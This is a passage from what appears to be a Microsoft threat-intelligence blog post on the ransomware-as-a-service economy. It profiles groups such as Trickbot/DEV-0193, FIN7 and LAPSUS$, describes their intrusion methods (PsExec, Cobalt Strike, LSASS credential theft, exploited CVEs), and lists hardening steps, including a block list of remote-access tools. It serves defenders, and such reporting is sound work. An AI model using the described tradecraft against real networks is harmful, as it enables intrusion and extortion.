LLC. DEV-0193 is responsible for developing, distributing, and managing many different payloads, including Trickbot, Bazaloader, and AnchorDNS. In addition, DEV-0193 managed the Ryuk RaaS program before the latter\u2019s shutdown in June 2021, and Ryuk\u2019s successor, Conti as well as Diavol. Microsoft has been tracking the activities of DEV-0193 since October 2020 and has observed their expansion from developing and distributing the Trickbot malware to becoming the most prolific ransomware-associated cybercriminal activity group active today. \n\nDEV-0193\u2019s actions and use of the cybercriminal gig economy means they often add new members and projects and utilize contractors to perform various parts of their intrusions. As other malware operations have shut down for various reasons, including legal actions, DEV-0193 has hired developers from these groups. Most notable are the acquisitions of developers from Emotet, Qakbot, and IcedID, bringing them to the DEV-0193 umbrella.\n\nA subgroup of DEV-0193, which Microsoft tracks as DEV-0365, provides infrastructure-as-a-service for cybercriminals. Most notably, DEV-0365 provides Cobalt Strike Beacon-as-a-service. These DEV-0365 Beacons have replaced unique C2 infrastructure in many active malware campaigns. DEV-0193 infrastructure has also been [implicated](<https://www.microsoft.com/security/blog/2021/09/15/analyzing-attacks-that-exploit-the-mshtml-cve-2021-40444-vulnerability/>) in attacks deploying novel techniques, including exploitation of CVE-2021-40444. \n\nThe leaked chat files from a group publicly labeled as the \u201cConti Group\u201d in February 2022 confirm the wide scale of DEV-0193 activity tracked by Microsoft. Based on our telemetry from 2021 and 2022, Conti has become one of the most deployed RaaS ecosystems, with multiple affiliates concurrently deploying their payload\u2014even as other RaaS ecosystems (DarkSide/BlackMatter and REvil) ceased operations. However, payload-based attribution meant that much of the activity that led to Conti ransomware deployment was attributed to the \u201cConti Group,\u201d even though many affiliates had wildly different tradecraft, skills, and reporting structures. Some Conti affiliates performed small-scale intrusions using the tools offered by the RaaS, while others performed weeks-long operations involving data exfiltration and extortion using their own techniques and tools. One of the most prolific and successful Conti affiliates\u2014and the one responsible for developing the \u201cConti Manual\u201d leaked in August 2021\u2014is tracked as DEV-0230. This activity group also developed and deployed the FiveHands and HelloKitty ransomware payloads and often gained access to an organization via DEV-0193\u2019s BazaLoader infrastructure.\n\n### ELBRUS: (Un)arrested development\n\nELBRUS, also known as FIN7, has been known to be in operation since 2012 and has run multiple campaigns targeting a broad set of industries for financial gain. ELBRUS has deployed point-of-sale (PoS) and ATM malware to collect payment card information from in-store checkout terminals. They have also targeted corporate personnel who have access to sensitive financial data, including individuals involved in SEC filings.\n\nIn 2018, this activity group made headlines when [three of its members were arrested](<https://www.justice.gov/opa/pr/three-members-notorious-international-cybercrime-group-fin7-custody-role-attacking-over-100>). In May 2020, another arrest was made for an individual with alleged involvement with ELBRUS. However, despite law enforcement actions against suspected individual members, Microsoft has observed sustained campaigns from the ELBRUS group itself during these periods.\n\nELBRUS is responsible for developing and distributing multiple custom malware families used for persistence, including JSSLoader and Griffon. ELBRUS has also created fake security companies called \u201cCombi Security\u201d and \u201cBastion Security\u201d to facilitate the recruitment of employees to their operations under the pretense of working as penetration testers.\n\nIn 2020 ELBRUS transitioned from using PoS malware to deploying ransomware as part of a financially motivated extortion scheme, specifically deploying the MAZE and Revil RaaS families. ELBRUS developed their own RaaS ecosystem named DarkSide. They deployed DarkSide payloads as part of their operations and recruited and managed affiliates that deployed the DarkSide ransomware. The tendency to report on ransomware incidents based on payload and attribute it to a monolithic gang often obfuscates the true relationship between the attackers, which is very accurate of the DarkSide RaaS. Case in point, one of the most infamous DarkSide deployments wasn\u2019t performed by ELBRUS but by a ransomware-as-a-service affiliate Microsoft tracks as DEV-0289.\n\nELBRUS retired the DarkSide ransomware ecosystem in May 2021 and released its successor, BlackMatter, in July 2021. Replicating their patterns from DarkSide, ELBRUS deployed BlackMatter themselves and ran a RaaS program for affiliates. The activity group then retired the BlackMatter ransomware ecosystem in November 2021.\n\nWhile they aren\u2019t currently publicly observed to be running a RaaS program, ELBRUS is very active in compromising organizations via phishing campaigns that lead to their JSSLoader and Griffon malware. Since 2019, ELBRUS has partnered with DEV-0324 to distribute their malware implants. DEV-0324 acts as a distributor in the cybercriminal economy, providing a service to distribute the payloads of other attackers through phishing and exploit kit vectors. ELBRUS has also been abusing CVE-2021-31207 in Exchange to compromise organizations in April of 2022, an interesting pivot to using a less popular authenticated vulnerability in the ProxyShell cluster of vulnerabilities. This abuse has allowed them to target organizations that patched only the unauthenticated vulnerability in their Exchange Server and turn compromised low privileged user credentials into highly privileged access as SYSTEM on an Exchange Server. \n\n### DEV-0504: Shifting payloads reflecting the rise and fall of RaaS programs\n\nAn excellent example of how clustering activity based on ransomware payload alone can lead to obfuscating the threat actors behind the attack is DEV-0504. DEV-0504 has deployed at least six RaaS payloads since 2020, with many of their attacks becoming high-profile incidents attributed to the \u201cREvil gang\u201d or \u201cBlackCat ransomware group\u201d. This attribution masks the actions of the set of the attackers in the DEV-0504 umbrella, including other REvil and BlackCat affiliates. This has resulted in a confusing story of the scale of the ransomware problem and overinflated the impact that a single RaaS program shutdown can have on the threat environment. \n\nFigure 3. Ransomware payloads distributed by DEV-0504 between 2020 and April 2022\n\nDEV-0504 shifts payloads when a RaaS program shuts down, for example the deprecation of REvil and BlackMatter, or possibly when a program with a better profit margin appears. These market dynamics aren\u2019t unique to DEV-0504 and are reflected in most RaaS affiliates. They can also manifest in even more extreme behavior where RaaS affiliates switch to older \u201cfully owned\u201d ransomware payloads like Phobos, which they can buy when a RaaS isn\u2019t available, or they don\u2019t want to pay the fees associated with RaaS programs.\n\nDEV-0504 appears to rely on access brokers to enter a network, using Cobalt Strike Beacons they have possibly purchased access to. Once inside a network, they rely heavily on PsExec to move laterally and stage their payloads. Their techniques require them to have compromised elevated credentials, and they frequently disable antivirus products that aren\u2019t protected with tamper protection.\n\nDEV-0504 was responsible for deploying BlackCat ransomware in companies in the energy sector in January 2022. Around the same time, DEV-0504 also deployed BlackCat in attacks against companies in the fashion, tobacco, IT, and manufacturing industries, among others.\n\n### DEV-0237: Prolific collaborator\n\nLike DEV-0504, DEV-0237 is a prolific RaaS affiliate that alternates between different payloads in their operations based on what is available. DEV-0237 heavily used Ryuk and Conti payloads from Trickbot LLC/DEV-0193, then Hive payloads more recently. Many publicly documented Ryuk and Conti incidents and tradecraft can be traced back to DEV-0237.\n\nAfter the activity group switched to Hive as a payload, a large uptick in Hive incidents was observed. Their switch to the BlackCat RaaS in March 2022 is suspected to be due to [public discourse](<https://www.securityweek.com/researchers-devise-method-decrypt-hive-ransomware-encrypted-data>) around Hive decryption methodologies; that is, DEV-0237 may have switched to BlackCat because they didn\u2019t want Hive\u2019s decryptors to interrupt their business. Overlap in payloads has occurred as DEV-0237 experiments with new RaaS programs on lower-value targets. They have been observed to experiment with some payloads only to abandon them later.\n\n_Figure 4. Ransomware payloads distributed by DEV-0237 between 2020 and April 2022_\n\nBeyond RaaS payloads, DEV-0237 uses the cybercriminal gig economy to also gain initial access to networks. DEV-0237\u2019s proliferation and success rate come in part from their willingness to leverage the network intrusion work and malware implants of other groups versus performing their own initial compromise and malware development.\n\nFigure 5. Examples of DEV-0237\u2019s relationships with other cybercriminal activity groups\n\nLike all RaaS operators, DEV-0237 relies on compromised, highly privileged account credentials and security weaknesses once inside a network. DEV-0237 often leverages Cobalt Strike Beacon dropped by the malware they have purchased, as well as tools like SharpHound to conduct reconnaissance. The group often utilizes BITSadmin /transfer to stage their payloads. An often-documented trademark of Ryuk and Conti deployments is naming the ransomware payload _xxx.exe_, a tradition that DEV-0237 continues to use no matter what RaaS they are deploying, as most recently observed with BlackCat. In late March of 2022, DEV-0237 was observed to be using a new version of Hive again.\n\n### DEV-0206 and DEV-0243: An \u201cevil\u201d partnership\n\nMalvertising, which refers to taking out a search engine ad to lead to a malware payload, has been used in many campaigns, but the access broker that Microsoft tracks as DEV-0206 uses this as their primary technique to gain access to and profile networks. Targets are lured by an ad purporting to be a browser update, or a software package, to download a ZIP file and double-click it. The ZIP package contains a JavaScript file (.js), which in most environments runs when double-clicked. Organizations that have changed the settings such that script files open with a text editor by default instead of a script handler are largely immune from this threat, even if a user double clicks the script.\n\nOnce successfully executed, the JavaScript framework, also referred to [SocGholish](<https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/wastedlocker-ransomware-us>), acts as a loader for other malware campaigns that use access purchased from DEV-0206, most commonly Cobalt Strike payloads. These payloads have, in numerous instances, led to custom Cobalt Strike loaders attributed to DEV-0243. DEV-0243 falls under activities tracked by the cyber intelligence industry as \u201cEvilCorp,\u201d The custom Cobalt Strike loaders are similar to those seen in publicly documented [Blister](<https://www.elastic.co/blog/elastic-security-uncovers-blister-malware-campaign>) malware\u2019s inner payloads. In DEV-0243\u2019s initial partnerships with DEV-0206, the group deployed a custom ransomware payload known as WastedLocker, and then expanded to additional DEV-0243 ransomware payloads developed in-house, such as PhoenixLocker and Macaw.\n\nAround November 2021, DEV-0243 started to deploy the LockBit 2.0 RaaS payload in their intrusions. The use of a RaaS payload by the \u201cEvilCorp\u201d activity group is likely an attempt by DEV-0243 to avoid attribution to their group, which could discourage payment due to their sanctioned status. \n\nFigure 6. The handover from DEV-0206 to DEV-0243\n\n### DEV-0401: China-based lone wolf turned LockBit 2.0 affiliate\n\nDiffering from the other RaaS developers, affiliates, and access brokers profiled here, DEV-0401 appears to be an activity group involved in all stages of their attack lifecycle, from initial access to ransomware development. Despite this, they seem to take some inspiration from successful RaaS operations with the frequent rebranding of their ransomware payloads. Unique among human-operated ransomware threat actors tracked by Microsoft, DEV-0401 [is confirmed to be a China-based activity group.](<https://twitter.com/MsftSecIntel/status/1480730559739359233>)\n\nDEV-0401 differs from many of the attackers who rely on purchasing access to existing malware implants or exposed RDP to enter a network. Instead, the group heavily utilizes unpatched vulnerabilities to access networks, including vulnerabilities in Exchange, Manage Engine AdSelfService Plus, Confluence, and [Log4j 2](<https://digital.nhs.uk/cyber-alerts/2022/cc-4002>). Due to the nature of the vulnerabilities they preferred, DEV-0401 gains elevated credentials at the initial access stage of their attack.\n\nOnce inside a network, DEV-0401 relies on standard techniques such as using Cobalt Strike and WMI for lateral movement, but they have some unique preferences for implementing these behaviors. Their Cobalt Strike Beacons are frequently launched via DLL search order hijacking. While they use the common Impacket tool for WMI lateral movement, they use a customized version of the _wmiexec.py_ module of the tool that creates renamed output files, most likely to evade static detections. Ransomware deployment is ultimately performed from a batch file in a share and Group Policy, usually written to the NETLOGON share on a Domain Controller, which requires the attackers to have obtained highly privileged credentials like Domain Administrator to perform this action.\n\nFigure 7. Ransomware payloads distributed by DEV-0401 between 2021 and April 2022\n\nBecause DEV-0401 maintains and frequently rebrands their own ransomware payloads, they can appear as different groups in payload-driven reporting and evade detections and actions against them. Their payloads are sometimes rebuilt from existing for-purchase ransomware tools like Rook, which shares code similarity with the Babuk ransomware family. In February of 2022, DEV-0401 was observed deploying the Pandora ransomware family, primarily via unpatched VMware Horizon systems vulnerable to the [Log4j 2 CVE-2021-44228 vulnerability](<https://digital.nhs.uk/cyber-alerts/2022/cc-4002>).\n\nLike many RaaS operators, DEV-0401 maintained a leak site to post exfiltrated data and motivate victims to pay, however their frequent rebranding caused these systems to sometimes be unready for their victims, with their leak site sometimes leading to default web server landing pages when victims attempt to pay. In a notable shift\u2014possibly related to victim payment issues\u2014DEV-0401 started deploying LockBit 2.0 ransomware payloads in April 2022.\n\n### DEV-0537: From extortion to destruction\n\nAn example of a threat actor who has moved to a pure extortion and destruction model without deploying ransomware payloads is an activity group that Microsoft tracks as DEV-0537, also known as LAPSUS$. Microsoft has detailed DEV-0537 actions taken in early 2022 [in this blog](<https://www.microsoft.com/security/blog/2022/03/22/dev-0537-criminal-actor-targeting-organizations-for-data-exfiltration-and-destruction/>). DEV-0537 started targeting organizations mainly in Latin America but expanded to global targeting, including government entities, technology, telecom, retailers, and healthcare. Unlike more opportunistic attackers, DEV-0537 targets specific companies with an intent. Their initial access techniques include exploiting unpatched vulnerabilities in internet-facing systems, searching public code repositories for credentials, and taking advantage of weak passwords. In addition, there is evidence that DEV-0537 leverages credentials stolen by the Redline password stealer, a piece of malware available for purchase in the cybercriminal economy. The group also buys credentials from underground forums which were gathered by other password-stealing malware.\n\nOnce initial access to a network is gained, DEV-0537 takes advantage of security misconfigurations to elevate privileges and move laterally to meet their objectives of data exfiltration and extortion. While DEV-0537 doesn\u2019t possess any unique technical capabilities, the group is especially cloud-aware. They target cloud administrator accounts to set up forwarding rules for email exfiltration and tamper with administrative settings on cloud environments. As part of their goals to force payment of ransom, DEV-0537 attempts to delete all server infrastructure and data to cause business disruption. To further facilitate the achievement of their goals, they remove legitimate admins and delete cloud resources and server infrastructure, resulting in destructive attacks. \n\nDEV-0537 also takes advantage of cloud admin privileges to monitor email, chats, and VOIP communications to track incident response efforts to their intrusions. DEV-0537 has been observed on multiple occasions to join incident response calls, not just observing the response to inform their attack but unmuting to demand ransom and sharing their screens while they delete their victim\u2019s data and resources.\n\n## Defending against ransomware: Moving beyond protection by detection\n\nA durable security strategy against determined human adversaries must include the goal of mitigating classes of attacks and detecting them. Ransomware attacks generate multiple, disparate security product alerts, but they could easily get lost or not responded to in time. Alert fatigue is real, and SOCs can make their lives easier by looking at trends in their alerts or grouping alerts into incidents so they can see the bigger picture. SOCs can then mitigate alerts using hardening capabilities like attack surface reduction rules. Hardening against common threats can reduce alert volume and stop many attackers before they get access to networks. \n\nAttackers tweak their techniques and have tools to evade and disable security products. They are also well-versed in system administration and try to blend in as much as possible. However, while attacks have continued steadily and with increased impact, the attack techniques attackers use haven\u2019t changed much over the years. Therefore, a renewed focus on prevention is needed to curb the tide.\n\nRansomware attackers are motivated by easy profits, so adding to their cost via security hardening is key in disrupting the cybercriminal economy.\n\n### Building credential hygiene\n\nMore than malware, attackers need credentials to succeed in their attacks. In almost all attacks where ransomware deployment was successful, the attackers had access to a domain admin-level account or local administrator passwords that were consistent throughout the environment. Deployment then can be done through Group Policy or tools like PsExec (or clones like PAExec, CSExec, and WinExeSvc). Without the credentials to provide administrative access in a network, spreading ransomware to multiple systems is a bigger challenge for attackers. Compromised credentials are so important to these attacks that when cybercriminals sell ill-gotten access to a network, in many instances, the price includes a guaranteed administrator account to start with.\n\nCredential theft is a common attack pattern. Many administrators know tools like Mimikatz and LaZagne, and their capabilities to steal passwords from interactive logons in the LSASS process. Detections exist for these tools accessing the LSASS process in most security products. However, the risk of credential exposure isn\u2019t just limited to a domain administrator logging in interactively to a workstation. Because attackers have accessed and explored many networks during their attacks, they have a deep knowledge of common network configurations and use it to their advantage. One common misconfiguration they exploit is running services and scheduled tasks as highly privileged service accounts.\n\nToo often, a legacy configuration ensures that a mission-critical application works by giving the utmost permissions possible. Many organizations struggle to fix this issue even if they know about it, because they fear they might break applications. This configuration is especially dangerous as it leaves highly privileged credentials exposed in the LSA Secrets portion of the registry, which users with administrative access can access. In organizations where the local administrator rights haven\u2019t been removed from end users, attackers can be one hop away from domain admin just from an initial attack like a banking trojan. Building credential hygiene is developing a logical segmentation of the network, based on privileges, that can be implemented alongside network segmentation to limit lateral movement.\n\n**Here are some steps organizations can take to build credential hygiene:**\n\n * Aim to run services as Local System when administrative privileges are needed, as this allows applications to have high privileges locally but can\u2019t be used to move laterally. Run services as Network Service when accessing other resources.\n * Use tools like [LUA Buglight](<https://techcommunity.microsoft.com/t5/windows-blog-archive/lua-buglight-2-3-with-support-for-windows-8-1-and-windows-10/ba-p/701459>) to determine the privileges that applications really need.\n * Look for events with EventID 4624 where [the logon type](<https://twitter.com/jepayneMSFT/status/1012815189345857536>) is 2, 4, 5, or 10 _and_ the account is highly privileged like a domain admin. This helps admins understand which credentials are vulnerable to theft via LSASS or LSA Secrets. Ideally, any highly privileged account like a Domain Admin shouldn\u2019t be exposed on member servers or workstations.\n * Monitor for EventID 4625 (Logon Failed events) in Windows Event Forwarding when removing accounts from privileged groups. Adding them to the local administrator group on a limited set of machines to keep an application running still reduces the scope of an attack as against running them as Domain Admin.\n * Randomize Local Administrator passwords with a tool like [Local Administrator Password S](<https://aka.ms/laps>)olution (LAPS) to prevent lateral movement using local accounts with shared passwords.\n * Use a [cloud-based identity security solution](<https://docs.microsoft.com/defender-for-identity/what-is>) that leverages on-premises Active Directory signals get visibility into identity configurations and to identify and detect threats or compromised identities\n\n### Auditing credential exposure\n\nAuditing credential exposure is critical in preventing ransomware attacks and cybercrime in general. [BloodHound](<https://github.com/BloodHoundAD/BloodHound>) is a tool that was originally designed to provide network defenders with insight into the number of administrators in their environment. It can also be a powerful tool in reducing privileges tied to administrative account and understanding your credential exposure. IT security teams and SOCs can work together with the authorized use of this tool to enable the reduction of exposed credentials. Any teams deploying BloodHound should monitor it carefully for malicious use. They can also use [this detection guidance](<https://techcommunity.microsoft.com/t5/microsoft-defender-for-endpoint/hunting-for-reconnaissance-activities-using-ldap-search-filters/ba-p/824726>) to watch for malicious use.\n\nMicrosoft has observed ransomware attackers also using BloodHound in attacks. When used maliciously, BloodHound allows attackers to see the path of least resistance from the systems they have access, to highly privileged accounts like domain admin accounts and global administrator accounts in Azure.\n\n### Prioritizing deployment of Active Directory updates\n\nSecurity patches for Active Directory should be applied as soon as possible after they are released. Microsoft has witnessed ransomware attackers adopting authentication vulnerabilities within one hour of being made public and as soon as those vulnerabilities are included in tools like Mimikatz. Ransomware activity groups also rapidly adopt vulnerabilities related to authentication, such as ZeroLogon and PetitPotam, especially when they are included in toolkits like Mimikatz. When unpatched, these vulnerabilities could allow attackers to rapidly escalate from an entrance vector like email to Domain Admin level privileges.\n\n### Cloud hardening\n\nAs attackers move towards cloud resources, it\u2019s important to secure cloud resources and identities as well as on-premises accounts. Here are ways organizations can harden cloud environments:\n\n**Cloud identity hardening**\n\n * Implement the [Azure Security Benchmark](<https://docs.microsoft.com/security/benchmark/azure/>) and general [best practices for securing identity infrastructure](<https://docs.microsoft.com/azure/security/fundamentals/identity-management-best-practices>), including:\n * Prevent on-premises service accounts from having direct rights to the cloud resources to prevent lateral movement to the cloud.\n * Ensure that \u201cbreak glass\u201d account passwords are stored offline and configure honey-token activity for account usage.\n * Implement [Conditional Access policies](<https://docs.microsoft.com/azure/active-directory/conditional-access/plan-conditional-access>) enforcing [Microsoft\u2019s Zero Trust principles](<https://www.microsoft.com/security/business/zero-trust>).\n * Enable [risk-based user sign-in protection](<https://docs.microsoft.com/azure/active-directory/authentication/tutorial-risk-based-sspr-mfa>) and automate threat response to block high-risk sign-ins from all locations and enable MFA for medium-risk ones.\n * Ensure that VPN access is protected via [modern authentication methods](<https://docs.microsoft.com/azure/active-directory/fundamentals/concept-fundamentals-block-legacy-authentication#step-1-enable-modern-authentication-in-your-directory>).\n\n**Multifactor authentication (MFA)**\n\n * Enforce MFA on all accounts, remove users excluded from MFA, and strictly r[equire MFA](<https://docs.microsoft.com/azure/active-directory/identity-protection/howto-identity-protection-configure-mfa-policy>) from all devices, in all locations, at all times.\n * Enable passwordless authentication methods (for example, Windows Hello, FIDO keys, or Microsoft Authenticator) for accounts that support passwordless. For accounts that still require passwords, use authenticator apps like Microsoft Authenticator for MFA. Refer to [this article](<https://docs.microsoft.com/azure/active-directory/authentication/concept-authentication-methods>) for the different authentication methods and features.\n * [Identify and secure workload identities](<https://docs.microsoft.com/azure/active-directory/identity-protection/concept-workload-identity-risk>) to secure accounts where traditional MFA enforcement does not apply.\n * Ensure that users are properly educated on not accepting unexpected two-factor authentication (2FA).\n * For MFA that uses authenticator apps, ensure that the app requires a code to be typed in where possible, as many intrusions where MFA was enabled (including those by DEV-0537) still succeeded due to users clicking \u201cYes\u201d on the prompt on their phones even when they were not at their [computers](<https://docs.microsoft.com/azure/active-directory/authentication/how-to-mfa-number-match>). Refer to [this article](<https://docs.microsoft.com/azure/active-directory/authentication/concept-authentication-methods>) for an example.\n * Disable [legacy authentication](<https://docs.microsoft.com/azure/active-directory/fundamentals/concept-fundamentals-block-legacy-authentication#moving-away-from-legacy-authentication>).\n\n**Cloud admins**\n\n * Ensure cloud admins/tenant admins are treated with [the same level of security and credential hygiene](<https://docs.microsoft.com/azure/active-directory/roles/best-practices>) as Domain Admins.\n * Address [gaps in authentication coverage](<https://docs.microsoft.com/azure/active-directory/authentication/how-to-authentication-find-coverage-gaps>).\n\n### Addressing security blind spots\n\nIn almost every observed ransomware incident, at least one system involved in the attack had a misconfigured security product that allowed the attacker to disable protections or evade detection. In many instances, the initial access for access brokers is a legacy system that isn\u2019t protected by antivirus or EDR solutions. It\u2019s important to understand that the lack security controls on these systems that have access to highly privileged credentials act as blind spots that allow attackers to perform the entire ransomware and exfiltration attack chain from a single system without being detected. In some instances, this is specifically advertised as a feature that access brokers sell.\n\nOrganizations should review and verify that security tools are running in their most secure configuration and perform regular network scans to ensure appropriate security products are monitoring and protecting all systems, including servers. If this isn\u2019t possible, make sure that your legacy systems are either physically isolated through a firewall or logically isolated by ensuring they have no credential overlap with other systems.\n\nFor Microsoft 365 Defender customers, the following checklist eliminates security blind spots:\n\n * Turn on [cloud-delivered protection](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/configure-block-at-first-sight-microsoft-defender-antivirus?view=o365-worldwide>) in Microsoft Defender Antivirus to cover rapidly evolving attacker tools and techniques, block new and unknown malware variants, and enhance attack surface reduction rules and tamper protection.\n * Turn on [tamper protection](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/prevent-changes-to-security-settings-with-tamper-protection?view=o365-worldwide>) features to prevent attackers from stopping security services.\n * Run [EDR in block mode](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/edr-in-block-mode?view=o365-worldwide>) so that Microsoft Defender for Endpoint can block malicious artifacts, even when a non-Microsoft antivirus doesn\u2019t detect the threat or when Microsoft Defender Antivirus is running in passive mode. EDR in block mode also blocks indicators identified proactively by Microsoft Threat Intelligence teams.\n * Enable [network protection](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/enable-network-protection?view=o365-worldwide>) to prevent applications or users from accessing malicious domains and other malicious content on the internet.\n * Enable [investigation and remediation](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/automated-investigations?view=o365-worldwide>) in full automated mode to allow Microsoft Defender for Endpoint to take immediate action on alerts to resolve breaches.\n * Use [device discovery](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/device-discovery?view=o365-worldwide>) to increase visibility into the network by finding unmanaged devices and onboarding them to Microsoft Defender for Endpoint.\n * [Protect user identities and credentials](<https://docs.microsoft.com/defender-for-identity/what-is>) using Microsoft Defender for Identity, a cloud-based security solution that leverages on-premises Active Directory signals to monitor and analyze user behavior to identify suspicious user activities, configuration issues, and active attacks.\n\n### Reducing the attack surface\n\nMicrosoft 365 Defender customers can turn on [attack surface reduction rules](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction?view=o365-worldwide>) to prevent common attack techniques used in ransomware attacks. These rules, which can be configured by all Microsoft Defender Antivirus customers and not just those using the EDR solution, offer significant hardening against attacks. In observed attacks from several ransomware-associated activity groups, Microsoft customers who had the following rules enabled were able to mitigate the attack in the initial stages and prevented hands-on-keyboard activity:\n\n * Common entry vectors:\n * [Block all Office applications from creating child processes](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction#block-all-office-applications-from-creating-child-processes>)\n * [Block Office communication application from creating child processes](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction#block-office-communication-application-from-creating-child-processes>)\n * [Block Office applications from creating executable content](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction#block-office-applications-from-creating-executable-content>)\n * [Block Office applications from injecting code into other processes](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction#block-office-applications-from-injecting-code-into-other-processes>)\n * [Block execution of potentially obfuscated scripts](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction#block-execution-of-potentially-obfuscated-scripts>)\n * [Block JavaScript or VBScript from launching downloaded executable content](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction#block-javascript-or-vbscript-from-launching-downloaded-executable-content>)\n * Ransomware deployment and lateral movement stage (in order of impact based on the stage in attack they prevent):\n * [Block executable files from running unless they meet a prevalence, age, or trusted list criterion](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction#block-executable-files-from-running-unless-they-meet-a-prevalence-age-or-trusted-list-criterion>)\n * [Block credential stealing from the Windows local security authority subsystem (lsass.exe)](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction#block-credential-stealing-from-the-windows-local-security-authority-subsystem>)\n * [Block process creations originating from PsExec and WMI commands](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction#block-process-creations-originating-from-psexec-and-wmi-commands>)\n * [Use advanced protection against ransomware](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/attack-surface-reduction#use-advanced-protection-against-ransomware>)\n\nIn addition, Microsoft has changed the [default behavior of Office applications to block macros](<https://docs.microsoft.com/DeployOffice/security/internet-macros-blocked>) in files from the internet, further reduce the attack surface for many human-operated ransomware attacks and other threats.\n\n### Hardening internet-facing assets and understanding your perimeter\n\nOrganizations must identify and secure perimeter systems that attackers might use to access the network. Public scanning interfaces, such as [RiskIQ](<https://www.riskiq.com/what-is-attack-surface-management/>), can be used to augment data. Some systems that should be considered of interest to attackers and therefore need to be hardened include:\n\n * Secure Remote Desktop Protocol (RDP) or Windows Virtual Desktop endpoints with MFA to harden against password spray or brute force attacks.\n * Block Remote IT management tools such as Teamviewer, Splashtop, Remote Manipulator System, Anydesk, Atera Remote Management, and ngrok.io via network blocking such as perimeter firewall rules if not in use in your environment. If these systems are used in your environment, enforce security settings where possible to implement MFA.\n\nRansomware attackers and access brokers also use unpatched vulnerabilities, whether already disclosed or zero-day, especially in the initial access stage. Even older vulnerabilities were implicated in ransomware incidents in 2022 because some systems remained unpatched, partially patched, or because access brokers had established persistence on a previously compromised systems despite it later being patched.\n\nSome observed vulnerabilities used in campaigns between 2020 and 2022 that defenders can check for and mitigate include:\n\n * Citrix ADC systems affected by [CVE-2019-19781](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19781>)\n * [Pulse Secure VPN systems](<https://us-cert.cisa.gov/ncas/alerts/aa21-110a>) affected by [CVE-2019-11510](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11510>), [CVE-2020-8260](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8260>), [CVE-2020-8243](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8243>), [CVE-2021-22893](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44784/>), [CVE-2021-22894](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22894>), [CVE-2021-22899](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22899>), and [CVE-2021-22900](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22900>)\n * SonicWall SSLVPN affected by [CVE-2021-20016](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20016>)\n * Microsoft SharePoint servers affected by [CVE-2019-0604](<https://msrc.microsoft.com/update-guide/en-us/vulnerability/CVE-2019-0604>)\n * Unpatched [Microsoft Exchange servers](<https://techcommunity.microsoft.com/t5/exchange-team-blog/released-may-2021-exchange-server-security-updates/ba-p/2335209>)\n * Zoho ManageEngine systems affected by [CVE-2020-10189](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10189>)\n * FortiGate VPN servers affected by [CVE-2018-13379](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13379>)\n * Apache log4j [CVE-2021-44228](<https://nvd.nist.gov/vuln/detail/CVE-2021-44228>)\n\nRansomware attackers also rapidly [adopt new vulnerabilities](<https://digital.nhs.uk/cyber-alerts/2022/cc-4002>). To further reduce organizational exposure, Microsoft Defender for Endpoint customers can use the [threat and vulnerability management](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/next-gen-threat-and-vuln-mgt>) capability to discover, prioritize, and remediate vulnerabilities and misconfigurations.\n\n## Microsoft 365 Defender: Deep cross-domain visibility and unified investigation capabilities to defend against ransomware attacks\n\nThe multi-faceted threat of ransomware requires a comprehensive approach to security. The steps we outlined above defend against common attack patterns and will go a long way in preventing ransomware attacks. [Microsoft 365 Defender](<https://www.microsoft.com/microsoft-365/security/microsoft-365-defender>) is designed to make it easy for organizations to apply many of these security controls.\n\nMicrosoft 365 Defender\u2019s industry-leading visibility and detection capabilities, demonstrated in the recent [MITRE Engenuity ATT&CK\u00ae Evaluations](<https://www.microsoft.com/security/blog/2022/04/05/microsoft-365-defender-demonstrates-industry-leading-protection-in-the-2022-mitre-engenuity-attck-evaluations/>), automatically stop most common threats and attacker techniques. To equip organizations with the tools to combat human-operated ransomware, which by nature takes a unique path for every organization, Microsoft 365 Defender provides rich investigation features that enable defenders to seamlessly inspect and remediate malicious behavior across domains.\n\n[Learn how you can stop attacks through automated, cross-domain security and built-in AI with Microsoft Defender 365.](<https://www.microsoft.com/microsoft-365/security/microsoft-365-defender>)\n\nIn line with the recently announced expansion into a new service category called [**Microsoft Security Experts**](<https://www.microsoft.com/en-us/security/business/services>), we're introducing the availability of [Microsoft Defender Experts for Hunting](<https://docs.microsoft.com/en-us/microsoft-365/security/defender/defenderexpertsforhuntingprev>) for public preview. Defender Experts for Hunting is for customers who have a robust security operations center but want Microsoft to help them proactively hunt for threats across Microsoft Defender data, including endpoints, Office 365, cloud applications, and identity.\n\nJoin our research team at the **Microsoft Security Summit** digital event on May 12 to learn what developments Microsoft is seeing in the threat landscape, as well as how we can help your business mitigate these types of attacks. Ask your most pressing questions during the live chat Q&A. [Register today.](<https://mssecuritysummit.eventcore.com?ocid=AID3046765_QSG_584073>)\n\nThe post [Ransomware-as-a-service: Understanding the cybercrime gig economy and how to 